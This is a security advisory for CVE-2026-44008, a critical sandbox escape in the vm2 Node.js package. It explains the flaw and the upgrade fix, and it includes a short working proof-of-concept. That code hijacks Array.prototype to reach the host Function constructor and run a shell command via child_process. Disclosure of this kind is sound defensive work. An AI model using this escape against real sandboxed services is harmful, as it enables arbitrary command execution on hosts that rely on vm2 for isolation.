CVE-2026-44008
vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`
Description
### Summary VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. ### Details The new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object. ### PoC ```js const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run(` const a = []; Object.defineProperty(Array.prototype, 0, { set(value) { a.f = Buffer.prototype.inspect; value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); } }); new Buffer(a); `)); ``` ### Impact Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
How to fix CVE-2026-44008
To remediate CVE-2026-44008, upgrade the affected package to a fixed version below.
- —upgrade to 3.11.2 or later
Is CVE-2026-44008 being exploited?
Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 3.11.2
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |